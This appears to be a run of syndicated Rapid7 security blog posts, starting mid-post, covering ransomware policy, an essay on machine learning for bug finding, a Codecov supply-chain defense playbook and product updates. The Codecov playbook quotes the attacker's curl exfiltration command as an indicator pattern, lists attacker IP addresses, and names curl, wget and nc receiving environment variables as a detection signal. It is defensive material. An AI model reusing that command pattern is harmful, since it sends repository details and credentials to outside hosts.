On the other track — disrupting the system that facilitates the payment of ransoms — the RTF recommended that cryptocurrency exchanges, kiosks, and over-the-counter trading desks be required to comply with existing laws, such as Know Your Customer (KYC), Anti-Money Laundering (AML), and Combatting Financing of Terrorism (CFT) (Action 2.1.2, pages 29 and 30).

Better preparation, better response

During the explorations of the Task Force, it became apparent that part of the reason ransomware attacks are so successful is that many organizations don’t truly understand the threat, believe it’s relevant to them, or understand how to protect themselves. We repeatedly heard that, while there is a lot of information on ransomware, it’s overwhelming and often unhelpful. Many organizations don’t know what to focus on, and guidance may be oversimplified, overcomplicated, or insufficient.

With this in mind, one of our top recommendations was for the development of a ransomware framework that would cover measures for both preparing for and responding to attacks (Action 3.1.1, pages 35 and 36). The framework would need to be pragmatic, actionable, and address varying levels of sophistication and capability (Action 3.1.2, page 36). And because one of our main themes was around international cooperation, we also recommended there be a single source of truth adopted and promoted by multiple governments around the world. In fact, we recommended the framework be developed through both international and public-private collaboration. It should also be kept up to date to react to evolving ransomware attack trends.

Creating the framework is a lift, but it’s only part of the battle — you can’t drive adoption if you don’t also tackle the lack of awareness and understanding. As such, we also recommend that governments run high-profile awareness campaigns, partnering with organizations with reach into audiences that aren’t being well addressed today (Actions 3.2.1 and 3.2.2, pages 37 and 38). For example, many governments have toolkits or content aimed at small-to-medium businesses, but most leaders of these organizations seem largely unaware of the risk — until someone they know personally is hit by an attack.

The path forward

Unfortunately, ransomware continues to dominate headlines and harm organizations around the world. As a result, many governments are paying a great deal of attention to this issue and looking for solutions. I’m relieved to say the Ransomware Task Force’s report and recommendations have seen a fair bit of interest and support. For us, the next challenge is to keep the momentum going and help governments translate interest into action.

In the meantime, my colleagues at Rapid7 and I will continue to try to help our customers and community prepare for and respond to attacks. We’re working on some other content to help people better understand the dynamics of the issue, as well as the steps they can take to protect themselves or get involved in broader response efforts.

Look out for our series of blogs on different aspects of ransomware, and in the meantime, check out our interviews with ransomware experts on our Security Nation podcast. You can also check out my talk and Q&A on the Ransomware Task Force at Black Hat, or as part of Rapid7’s Virtual Vegas, which includes a Ransomware (un)Happy Hour — bring your ransomware war stories, lessons learned, or questions.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

[The Lost Bots] Episode 1: External Threat Intelligence

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/07/19/lost-bots-vlog/

[The Lost Bots] Episode 1: External Threat Intelligence

Welcome to The Lost Bots, a new vlog series where Rapid7 resident expert and former CISO Jeffrey Gardner (virtually) sits down with fellow industry experts to spill the tea on current events and trends in the security space. They’ll also share security best practices and trade war stories with the Rapid7 SOC team. The best part? Each episode is short, sweet, and to the (end)point – so you gain insights from the industry’s brightest in just 15 minutes.

For this inaugural episode, Jeffrey sits down with Rapid7 Insight Platform SVP Pete Rubio and IntSights Cofounder and CPO Alon Arvats to discuss how teams can successfully leverage external threat intelligence to identify and mitigate lurking attacks. They tackle the “what”, “why”, and “how” of external threat intelligence. They also share how security teams can effectively put external threat intel into action and what behaviors and telemetry are the most useful to find advanced threats.

[The Lost Bots] Episode 1: External Threat Intelligence

Stay tuned for future episodes of The Lost Bots! For our second installment, Jeffrey will be back to discuss a topic we’ve all been hearing a lot about in recent months: Extended Detection and Response, or XDR.

Accelerating SecOps and Emergent Threat Response with the Insight Platform

Post Syndicated from Lee Weiner original https://blog.rapid7.com/2021/07/19/insight-platform-and-extended-detection-response/

Accelerating SecOps and Emergent Threat Response with the Insight Platform

When we talk to customers about the Insight Platform and how to best support their evolving needs, they’re often not asking for another product, but rather a capability that enhances a current experience. Our customers have the core ingredients of a robust security program, but as their attack surfaces endlessly sprawl, they’re looking for ways to double down on the efficiency and streamlining of security operations they’re already experiencing from the platform today. Efficiency and streamlined operations are 2 areas where our team will continue to focus efforts in order to deliver value across Rapid7’s growing best-in-class portfolio, while enabling cross-capability experiences that improve security-team effectiveness.

Responding to emerging threats and vulnerabilities: Alerts are not enough

One of Rapid7’s greatest strengths is the fact that we have market-leading products in detection and response, cloud security, and vulnerability management. As we increasingly see customers leveraging our products, there are many similar expectations from those user bases. One that stands out is the expectation/demand that Rapid7 quickly respond to emerging threats and new vulnerabilities in a way that provides actionable context. We refer to this program as Emergent Threat Response. We spend a lot of time on this today, though we need to do more here for our customers to help them combat emerging threats. We’re often addressing and detailing out what we know and what we’re doing about high-profile threats (e.g. SolarWinds SUNBURST, Microsoft Exchange Zero-Day), and while our customers have responded very positively to this type of outreach, they have also asked for more of it!

We have a unique opportunity with customers to enable a 2-way conversation. Our customers need to improve signal-to-noise, and our Emergent Threat Response approach does help to accomplish that. We can do a lot more though, and with more intelligence on the internal and external threat landscape we can offer more context and treat more threats with Emergent Threat Response. We’re constantly obsessing over improving signal-to-noise, so we’re careful to pick our spots. However, while an emerging threat may only impact a very small percentage of machines across our customer base, impacted customers may categorize those machines as high-value assets. Customers may also have a lot of interest in a specific threat group and are eager to learn more about them and the detections we have available for their known techniques. In both of these use cases — whether we’re pushing our intelligence or allowing customers to pull it — we can maintain our high standards for signal-to-noise as long as we’re always prioritizing relevancy.

The Insight Platform + IntSights: Enriching alerts and driving contextualized intelligence

When customers are battling emergent threats, core alerts and vulnerability information is important; but our customers are increasingly looking to understand more about adversary groups, tactics and techniques, and why they were targeted. Today we have a very comprehensive view of our customers’ internal networks. This is incredibly helpful to power every product we provide, but investing in more scalable ways to connect this internal profile to an external view of the world increases our ability to deliver timely, relevant, and actionable intelligence. With IntSights joining the Rapid7 family, this aspiration has become a reality. Beyond the Emergent Threat Response use case we drilled into here, the platform will leverage IntSights’ contextualized external threat intelligence to power and strengthen our threat library, risk scoring, and vulnerability prioritization. We believe we can add/enhance capabilities across the portfolio to not only help our customers solve the security concerns of today, but also take a proactive approach to defend against the security concerns of tomorrow.

Learn more about what’s in store for the Insight Platform as Rapid7 welcomes IntSights.

Why the Robot Hackers Aren’t Here (Yet)

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2021/07/14/why-the-robot-hackers-arent-here-yet/

Why the Robot Hackers Aren’t Here (Yet)

“Estragon: I’m like that. Either I forget right away or I never forget.” – Samuel Beckett, Waiting for Godot

Hacking and Automation

As hackers, we spend a lot of time making things easier for ourselves.

For example, you might be aware of a tool called Metasploit, which can be used to make getting into a target easier. We’ve also built internet-scale scanning tools, allowing us to easily view data about open ports across the internet. Some of our less ethical comrades-in-arms build worms and botnets to automate the process of doing whatever they want to do.

If the heart of hacking is making things do what they shouldn’t, then perhaps the lungs are automation.

Over the years, we’ve seen security in general and vulnerability discovery in particular move from a risky, shady business to massive corporate-sponsored activities with open marketplaces for bug bounties. We’ve also seen a concomitant improvement in the techniques of hacking.

If hackers had known in 1996 that we’d go from Stack-based buffer overflows to chaining ROP gadgets, perhaps we’d have asserted “no free bugs” earlier on. This maturity has allowed us to find a number of bugs that would have been unbelievable in the early 2000s, and exploits for those bugs are quickly packaged into tools like Metasploit.

Now that we’ve automated the process of running our exploits once they’ve been written, why is it so hard to get machines to find the bugs for us?

This is, of course, not for lack of trying. Fuzzing is a powerful technique that turns up a ton of bugs in an automated way. In fact, fuzzing is powerful enough that loads of folks turn up 0-days while they’re learning how to do fuzzing!

However, the trouble with fuzzing is that you never know what you’re going to turn up, and once you get a crash, there is a lot of work left to be done to craft an exploit and understand how and why the crash occurred — and that’s on top of all the work needed to craft a reliable exploit.

Automated bug finding, like we saw in the DARPA Cyber Grand Challenge, takes this to another level by combining fuzzing and symbolic execution with other program analysis techniques, like reachability and input dependence. But fuzzers and SMT solvers — a program that solves particular types of logic problems — haven’t found all the bugs, so what are we missing?

As with many problems in the last few years, organizations are hoping the answer lies in artificial intelligence and machine learning. The trouble with this hope is that AI is good at some tasks, and bug finding may simply not be one of them — at least not yet.

Learning to Find Bugs

Academic literature is rich with papers aiming to find bugs with machine learning. A quick Google Scholar search turns up over 140,000 articles on the topic as of this writing, and many of these articles seem to promise that, any day now, machine learning algorithms will turn up bugs in your source code.

There are a number of developer tools that suggest this could be true. Tools like Codota, Tabnine, and Kite will help auto-complete your code and are quite good. In fact, Microsoft has used GPT-3 to write code from natural language.

But creating code and finding bugs is sadly an entirely different problem. A 2017 paper written by Chappell et al — a collaboration between Australia’s Queensland University of Technology and the technology giant Oracle — found that a variety of machine learning approaches vastly underperformed Oracle’s Parfait system, which uses more traditional symbolic analysis techniques on the intermediate representations used by the compiler.

Another paper, out of the University of Oslo in Norway, Simulated SQL injection using Q-Learning, a form of Reinforcement Learning. This paper caused a stir in the MLSec community and especially within the DEF CON AI village (full disclosure: I am an officer for the AI village and helped cause the stir). The possibility of using a roomba-like method to find bugs was deeply enticing, and Erdodi et al. did great work.

However, their method requires a very particular environment, and although the agent learned to exploit the specific simulation, the method does not seem to generalize well. So, what’s a hacker to do?

Blaming Our Boots

“Vladimir: There’s man all over for you, blaming on his boots the faults of his feet.” – Samuel Beckett, Waiting for Godot

One of the fundamental problems with throwing machine learning at security problems is that many ML techniques have been optimized for particular types of data. This is particularly important for deep learning techniques.

Images are tensors — a sort of matrix with not just height and width but also color channels — of rectangular bit maps with a range of possible values for each pixel. Natural language is tokenized, and those tokens are mapped into a word embedding, like GloVe or Word2Vec.

This is not to downplay the tremendous accomplishments of these machine learning techniques but to demonstrate that, in order for us to repurpose them, we must understand why they were built this way.

Unfortunately, the properties we find important for computer vision — shift invariance and orientation invariance — are not properties that are important for tasks like vulnerability detection or malware analysis. There is, likewise, a heavy dependence in log analysis and similar tasks on tokens that are unlikely to be in our vocabulary — oddly encoded strings, weird file names, and unusual commands. This makes these techniques unsuitable for many of our defensive tasks and, for similar reasons, mostly useless for generating net-new exploits.

Why doesn’t this work? A few issues are at play here. First, the machine does not understand what it is learning. Machine learning algorithms are ultimately function approximators — systems that see some inputs and some outputs, and figure out what function generated them.

For example, if our dataset is:

X = {1, 3, 7, 11, 2}

Y = {3, 7, 15, 23, 5}

Our algorithm might see the first input and output: 3 = f(1) and guess that f(x) = 3x.

By the second input, it would probably be able to figure out that y = f(x) = 2x + 1.

By the fifth, there would be a lot of good evidence that f(x) = 2x + 1. But this is a simple linear model, with one weight term and one bias term. Once we have to account for a large number of dimensions and a function that turns a label like “cat” into a 32 x 32 image with 3 color channels, approximating that function becomes much harder.

It stands to reason then that the function which maps a few dozen lines of code that spread across several files into a particular class of vulnerability will be harder still to approximate.

Ultimately, the problem is neither the technology on its own nor the data representation on its own. It is that we are trying to use the data we have to solve a hard problem without addressing the underlying difficulties of that problem.

In our case, the challenge is not identifying vulnerabilities that look like others we’ve found before. The challenge is in capturing the semantic meaning of the code and the code flow at a point, and using that information to generate an output that tells us whether or not a certain condition is met.

This is what SAT solvers are trying to do. It is worth noting then that, from a purely theoretical perspective, this is the problem SAT, the canonical NP-Complete problem. It explains why the problem is so hard — we’re trying to solve one of the most challenging problems in computer science!

Waiting for Godot

The Samuel Beckett play, Waiting for Godot, centers around the characters of Vladimir and Estragon. The two characters are, as the title suggests, waiting for a character named Godot. To spoil a roughly 70-year-old play, I’ll give away the punchline: Godot never comes.

Today, security researchers who are interested in using artificial intelligence and machine learning to move the ball forward are in a similar position. We sit or stand by the leafless tree, waiting for our AI Godot. Like Vladimir and Estragon, our Godot will never come if we wait.

If we want to see more automation and applications of machine learning to vulnerability discovery, it will not suffice to repurpose convolutional neural networks, gradient-boosted decision trees, and transformers. Instead, we need to think about the way we represent data and how to capture the relevant details of that data. Then, we need to develop algorithms that can capture, learn, and retain that information.

We cannot wait for Godot — we have to find him ourselves.

Securing the Supply Chain: Lessons Learned from the Codecov Compromise

Post Syndicated from Justin Pagano original https://blog.rapid7.com/2021/07/09/securing-the-supply-chain-lessons-learned-from-the-codecov-compromise/

Securing the Supply Chain: Lessons Learned from the Codecov Compromise

Supply chain attacks are all the rage these days. While they’re not a new part of the threat landscape, they are growing in popularity among more sophisticated threat actors, and they can create significant system-wide disruption, expense, and loss of confidence across multiple organizations, sectors, or regions. The compromise of Codecov’s Bash Uploader script is one of the latest such attacks. While much is still unknown about the full impact of this incident on organizations around the world, it’s been another wake up call for the world that cybersecurity problems are getting more complex by the day.

This blog post is meant to provide the security community with defensive knowledge and techniques to protect against supply chain attacks involving continuous integration (CI) systems, such as Jenkins, Bamboo, etc., and version control systems, such as GitHub, GitLab, etc. It covers prevention techniques — for software suppliers and consumers — as well as detection and response techniques in the form of a playbook.

It has been co-developed by our Information Security, Security Research, and Managed Detection & Response teams. We believe one of the best ways for organizations to close their security achievement gap and outpace attackers is by openly sharing knowledge about ever-evolving security best practices.

Defending CI systems and source code repositories from similar supply chain attacks

Below are some of the security best practices defenders can use to prevent, detect, and respond to incidents like the Codecov compromise.

Securing the Supply Chain: Lessons Learned from the Codecov Compromise

Figure 1: High-level overview of known Codecov supply chain compromise stages

Prevention techniques

Provide and perform integrity checks for executable code

If you’re a software consumer

Use collision-resistant checksum hashes, such as with SHA-256 and SHA-512, provided by your vendor to validate checksums for all executable files or code they provide. Likewise, verify digital signatures for all executable files or code they provide.

If either of these integrity checks fail, notify your vendor ASAP as this could be a sign of compromised code.

If you’re a software supplier

Provide collision-resistant hashes, such as with SHA-256 and SHA-512, and store checksums out-of-band from their corresponding files (i.e. make it so that an attacker has to successfully carry out two attacks to compromise your code: one against the system hosting your checksum data and another against your content delivery systems). Provide users with easy-to-use instructions, including sample code, for performing checksum validation.

Additionally, digitally sign all executable code using tamper-resistant code signing frameworks such as in-toto and secure software update frameworks such as The Update Framework (TUF) (see DataDog’s blog post about using these tools for reference). Simply signing code with a private key is insufficient since attackers have demonstrated ways to compromise static signing keys stored on servers to forge authentic digital signatures.

Relevant for the following Codecov compromise attack stages:

  • Customers’ CI jobs dynamically load Bash Uploader

Version control third-party software components

Store and load local copies of third-party components in a version control system to track changes over time. Only update them after comparing code differences between versions, performing checksum validation, and authenticating digital signatures.

Relevant for the following Codecov compromise attack stages:

  • Bash Uploader script modified and replaced in GCS

Implement egress filtering

Identify trusted internet-accessible systems and apply host-based or network-based firewall rules to only allow egress network traffic to those trusted systems. Use specific IP addresses and fully qualified domain names whenever possible, and fallback to using IP ranges, subdomains, or domains only when necessary.

Relevant for the following Codecov compromise attack stages:

  • Environment variables, including creds, exfiltrated

Implement IP address safelisting

While zero-trust-networking (ZTN) doubts have been cast on the effectiveness of network perimeter security controls, such as IP address safelisting, they are still one of the easiest and most effective ways to mitigate attacks targeting internet routable systems. IP address safelisting is especially useful in the context of protecting service account access to systems when ZTN controls like hardware-backed device authentication certificates aren’t feasible to implement.

Popular source code repository services, such as GitHub, provide this functionality, although it may require you to host your own server or, if using their cloud hosted option, have multiple organizations in place to host your private repositories separately from your public repositories.

Relevant for the following Codecov compromise attack stages:

  • Creds used to access source code repos
  • Bash Uploader script modified and replaced in GCS

Apply least privilege permissions for CI jobs using job-specific credentials

For any credentials a CI job uses, provide a credential for that specific job (i.e. do not reuse a single credential across multiple CI jobs). Only provision permissions to each credential that are needed for the CI job to execute successfully: no more, no less. This will shrink the blast radius of a credential compromise

Relevant for the following Codecov compromise attack stages:

  • Creds used to access source code repos

Use encrypted secrets management for safe credential storage

If you absolutely cannot avoid storing credentials in source code, use cryptographic tooling such as AWS KMS and the AWS Encryption SDK to encrypt credentials before storing them in source code. Otherwise, store them in a secrets management solution, such as Vault, AWS Secrets Manager, or GitHub Actions Encrypted Secrets (if you’re using GitHub Actions as your CI service, that is).

Relevant for the following Codecov compromise attack stages:

  • Creds used to access source code repos

Block plaintext secrets from code commits

Implement pre-commit hooks with tools like git-secrets to detect and block plaintext credentials before they’re committed to your repositories.

Relevant for the following Codecov compromise attack stages:

  • Creds used to access source code repos

Use automated frequent service account credential rotation

Rotate credentials that are used programmatically (e.g. service account passwords, keys, tokens, etc.) to ensure that they’re made unusable at some point in the future if they’re exposed or obtained by an attacker.

If you’re able to automate credential rotation, rotate them as frequently as hourly. Also, create two “credential rotator” credentials that can both rotate all service account credentials and rotate each other. This ensures that the credential that is used to rotate other credentials is also short lived.

Relevant for the following Codecov compromise attack stages:

  • Creds used to access source code repos

Detection techniques

While we strongly advocate for adopting multiple layers of prevention controls to make it harder for attackers to compromise software supply chains, we also recognize that prevention controls are imperfect by themselves. Having multiple layers of detection controls is essential for catching suspicious or malicious activity that you can’t (or in some cases shouldn’t) have prevention controls for.

Identify Dependencies

You’ll need these in place to create detection rules and investigate suspicious activity:

  1. Process execution logs, including full command line data, or CI job output logs
  2. Network logs (firewall, network flow, etc.), including source and destination IP address
  3. Authentication logs (on-premise and cloud-based applications), including source IP and identity/account name
  4. Activity audit logs (on-premise and cloud-based applications), including source IP and identity/account name
  5. Indicators of compromise (IOCs), including IPs, commands, file hashes, etc.

Ingress from atypical IP addresses or regions

Whether or not you’re able to implement IP address safelisting for accessing certain systems/environments, use an IP address safelist to detect when atypical IP addresses are accessing critical systems that should only be accessed by trusted IPs.

Relevant for the following Codecov compromise attack stages:

  • Bash Uploader script modified and replaced in GCS
  • Creds used to access source code repos

Egress to atypical IP addresses or regions

Whether or not you’re able to implement egress filtering for certain systems/environments, use an IP address safelist to detect when atypical IP addresses are being connected to.

Relevant for the following Codecov compromise attack stages:

  • Environment variables, including creds, exfiltrated

Environment variables being passed to network connectivity processes

It’s unusual for a system’s local environment variables to be exported and passed into processes used to communicate over a network (curl, wget, nc, etc.), regardless of the IP address or domain being connected to.

Relevant for the following Codecov compromise attack stages:

  • Environment variables, including creds, exfiltrated

Response techniques

The response techniques outlined below are, in some cases, described in the context of the IOCs that were published by Codecov. Dependencies identified in “Detection techniques” above are also dependencies for response steps outlined below.

Data exfiltration response steps: CI servers

Identify and contain affected systems and data

  1. Search CI systems’ process logs, job output, and job configuration files to identify usage of compromised third-party components (in regex form). This will identify potentially affected CI systems that have been using the third-party component that is in scope. This is useful for getting a full inventory of potentially affected systems and examining any local logs that might not be in your SIEM

curl (-s )?https://codecov.io/bash

2. Search for known IOC IP addresses in regex form (based on RegExr community pattern)

(.*79\.135\.72\.34|178\.62\.86\.114|104\.248\.94\.23|185\.211\.156\.78|91\.194\.227\.*|5\.189\.73\.*|218\.92\.0\.247|122\.228\.19\.79|106\.107\.253\.89|185\.71\.67\.56|45\.146\.164\.164|118\.24\.150\.193|37\.203\.243\.207|185\.27\.192\.99\.*)

3. Search for known IOC command line pattern(s)

curl -sm 0.5 -d "$(git remote -v)

4. Create forensic image of affected system(s) identified in steps 1 – 3

5. Network quarantine and/or power off affected system(s)

6. Replace affected system(s) with last known good backup, image snapshot, or clean rebuild

7. Analyze forensic image and historical CI system process, job output, and/or network traffic data to identify potentially exposed sensitive data, such as credentials

Search for malicious usage of potentially exposed credentials

  1. Search authentication and activity audit logs for IP address IOCs
  2. Search authentication and activity audit logs for potentially compromised account events originating from IP addresses outside of organization’s known IP addresses
  3. This could potentially uncover new IP address IOCs

Unauthorized access response steps: source code repositories

Clone full historical source code repository content

Note: This content is based on git-based version control systems

Version control systems such as git coincidentally provide forensics-grade information by virtue of them tracking all changes over time. In order to be able to fully search all data from a given repository, certain git commands must be run in sequence.

  1. Set git config to get full commit history for all references (branches, tags), including pull requests, and clone repositories that need to be analyzed (*nix shell script)

git config --global remote.origin.fetch '+refs/pull/*:refs/remotes/origin/pull/*'
# Space delimited list of repos to clone
declare -a repos=("repo1" "repo2" "repo3")
git_url="https://myGitServer.biz/myGitOrg"
# Loop through each repo and clone it locally
for r in ${repos[@]}; do
echo "Cloning $git_url/$r"
git clone "$git_url/$r"
done

2. In the same directory where repositories were cloned from the step above, export full git commit history in text format for each repository. List git committers at top of each file in case they need to be contacted to gather context (*nix shell script)

git fetch --all
for dir in *(/) ; do
(rm $dir.commits.txt
cd $dir
git fetch --all
echo "******COMMITTERS FOR THIS REPO********" >> ../$dir.commits.txt
git shortlog -s -n >> ../$dir.commits.txt
echo "**************************************" >> ../$dir.commits.txt
git log --all --decorate --oneline --graph -p >> ../$dir.commits.txt
cd ..)
done

a. Note: the below steps can be done with tools such as Atom, Visual Studio Code, and Sublime Text and extensions/plugins you can install in them.

If performing manual reviews of these commit history text files, create copies of those files and use the regex below to find and replace git’s log graph formatting that prepends each line of text

^(\|\s*)*(\+|-|\\|/\||\*\|*)*\s*

b. Then, sort the text in ascending or descending order and de-duplicate/unique-ify it. This will make it easier to manually parse.

Search for binary files and content in repositories

Exporting commit history to text files does not export data from any binary files (e.g. ZIP files, XLSX files, etc.). In order to thoroughly analyze source code repository content, binary files need to be identified and reviewed.

  1. Find binary files in folder containing all cloned git repositories based on file extension (*nix shell script)

find -E . -regex '.*\.(jpg|png|pdf|doc|docx|xls|xlsx|zip|7z|swf|atom|mp4|mkv|exe|ppt|pptx|vsd|rar|tiff|tar|rmd|md)'

2. Find binary files in folder containing all cloned git repositories based on MIME type (*nix shell script)

find . -type f -print0 | xargs -0 file --mime-type | grep -e image/jpg -e image/png -e application/pdf -e application/msword -e application/vnd.openxmlformats-officedocument.wordprocessingml.document -e application/vnd.ms-excel -e application/vnd.openxmlformats-officedocument.spreadsheetml.sheet -e application/zip -e application/x-7z-compressed -e application/x-shockwave-flash -e video/mp4 -e application/vnd.ms-powerpoint -e application/vnd.openxmlformats-officedocument.presentationml.presentation -e application/vnd.visio -e application/vnd.rar -e image/tiff -e application/x-targ

3. Find encoded binary content in commit history text files and other text-based files

grep -ir "url(data:" | cut -d\) -f1
grep -ir "base64" | cut -d\" -f1

Search for plaintext credentials: passwords, API keys, tokens, certificate private keys, etc.

  1. Search commit history text files for known credential patterns using tools such as TruffleHog and GitLeaks
  2. Search binary file contents identified in Search for binary files and content in repositories for credentials

Search logs for malicious access to discovered credentials

  1. Follow steps from Data exfiltration response (Searching for malicious usage of potentially exposed credentials) using logs from systems associated with credentials discovered in Search for plaintext credentials

New findings about attacker behavior from Project Sonar

We are fortunate to have a tremendous amount of data at our fingertips thanks to Project Sonar which conducts internet-wide surveys across more than 70 different services and protocols to gain insights into global exposure to common vulnerabilities. We analyzed data from Project Sonar to see if we could gain any additional context about the IP address IOCs associated with Codecov’s Bash Uploader script compromise. What we found was interesting, to say the least:

  • The threat actor set up the first exfiltration server (178.62.86[.]114) on or about February 1, 2021
  • Historical DNS records from remotly[.]ru and seasonver[.]ru have, and continue to, point to this server
  • The threat actor configured a simple HTTP redirect on the exfiltration server to about.codecov.io to avoid detection
    { “http_code”: 301, “http_body”: “”, “server”: “nginx”, “alt-svc”: “clear”, “location”: “http://about.codecov.io/“, “via”: “1.1 google” }
  • The redirect was removed from the exfiltration server on or before February 22, 2021, presumably by the server owner having detected these changes
  • The threat actor set up new infrastructure (104.248.94[.]23) that more closely mirrored Codecov’s GCP setup as their new exfiltration server on or about March 7, 2021
    { “http_code”: 301, “http_body”: “”, “server”: “envoy”, “alt-svc”: “clear”, “location”: “http://about.codecov.io/“, “via”: “1.1 google” }
  • The new exfiltration server was last seen on April 1, 2021

We hope the content in this blog will help defenders prevent, detect, and respond to these types of supply chain attacks going forward.

What’s New in InsightIDR: Q2 2021 in Review

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/07/08/whats-new-in-insightidr-q2-2021-in-review/

What's New in InsightIDR: Q2 2021 in Review

This year, we’re focusing on providing customers with more extensibility and customization in InsightIDR — from adding new event sources to completely refreshing our Dashboard and Reporting experience, we’ve made some strides over the last few months.

This post offers a closer look at some of the recent updates and releases in InsightIDR, our SaaS SIEM, from Q2 2021.

Rapid7 Named a Leader in the Gartner Magic Quadrant for SIEM for the Second Year in a Row

We are thrilled to announce that Rapid7 has been named a Leader in the 2021 Gartner Magic Quadrant for SIEM. As the detection and response market becomes more competitive, we are honored to be recognized as one of the six 2021 Magic Quadrant Leaders named in this report.

We credit this achievement to our deep partnership with customers and our uncompromising commitment to delivering a solution that is intuitive and easy to execute for our users. You can read the full report for free here.

New and Improved Dashboards and Reporting Experience

We’re so excited to announce the release of our updated Dashboards and Reporting experience in InsightIDR! We’ve made some big improvements to our Card Library and Card Builder (including the addition of new visualizations), as well as a more customizable Reporting experience.

Card Library and Builder updates:

  • Users can now set different time ranges or use different log sets across multiple queries
  • Cards can be created from log sets, so you won’t need to manually update your dashboards if new logs get added
  • More flexibility to create the visualizations that best capture the dynamics of your network with the new Stacked Area, Word Cloud, and Packed Bubble visualizations

Reporting updates:

  • New functionality where users can now set multiple different reporting schedules, as well as email reports to any address for easier sharing
What's New in InsightIDR: Q2 2021 in Review

InsightIDR’s intuitive new Dashboard interface, featuring the new Word Cloud visualization.

Rapid7 and Velociraptor Join Forces

In April, Rapid7 acquired Velociraptor, an open-source technology and community used for endpoint monitoring, digital forensics, and incident response. We are committed to helping the Velociraptor community grow and thrive, and also plan to embed the Velociraptor Project into the Rapid7 Insight Platform, allowing our customers to benefit from this amazing technology and community.

Open source projects like Velociraptor enable the greater security community to move the industry forward. We have a track record of investing in, contributing to, and building on open source projects, dating as far back as 12 years ago with Metasploit, and in more recent years with Recog and AttackerKB. Supporting and learning from these open-source projects helps Rapid7 innovate, strengthen our product and service offerings, and bring greater value to our customers.

See more on our Velociraptor acquisition and what it means for Rapid7 customers in our blog post here.

Multi-Theme Support in InsightIDR

We’re excited to announce the release of the new dark theme in InsightIDR! This new theme will increase contrast and legibility, as well as reduce eye strain for users engaging with the screen for longer periods of time. It also provides more accessible options to those with color vision deficiency, enabling all users to have an optimal experience with our UI.

You can easily toggle between light and dark themes based on your needs for the task at hand by updating your Visual Preference within Profile Settings.

What's New in InsightIDR: Q2 2021 in Review

Switch between light and dark themes in InsightIDR in Profile Settings.

SCADAfence + InsightIDR for Broader OT Coverage

Joint customers of InsightIDR and SCADAfence can now configure SCADAfence to create and forward alerts to InsightIDR via syslog to generate third-party alerts.

For InsightIDR customers leveraging Enhanced Network Traffic Analysis, this integration will provide a broader picture of device activity. If a SCADAfence alert fires, Network Sensor data can show customers that not only is this device on their network, but also which network applications it’s associated with, as well as connections coming to and from that device.

For information on configuration, see our help documentation here.

Custom Parsing Tool Introduces the New RegEx Editor

The new Regex Editor provides increased flexibility for customers to extract out fields and custom parse their logs by enabling them to write their own regular expression. Users can use the RegEx Editor from the start, or start out in guided mode and switch over at any time.

See details and step-by-step instructions on how to leverage the new RegEx Editor in our updated documentation here.

What's New in InsightIDR: Q2 2021 in Review

Extracting out fields with the new Regex Editor in InsightIDR.

Improvements for Better Visibility into the Health of Your Network Sensors

  • View the number of deployed network sensors in your environment and related errors from the Data Collection Health page.
  • Identify Network Sensor errors more easily within InsightIDR. Network Sensor errors are now rolled into the Data Collection Issues KPI on the InsightIDR Home page overview and in the Data Collection Health menu item in the top menu bar.

For more information on managing your Network Sensor, read our documentation.

What's New in InsightIDR: Q2 2021 in Review

Easily view Network Sensor health from the InsightIDR homepage via Data Collection Health.

Insight Agent Updates

Rapid7’s Threat Intelligence and Detection Engineering (TIDE) Team recently released a detection that identifies if Insight Agents are not properly sending data back to the InsightIDR Platform. For more information, see our help documentation here.

Stay Tuned for More!

As always, we’re continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and release notes as we continue to highlight the latest in detection and response at Rapid7.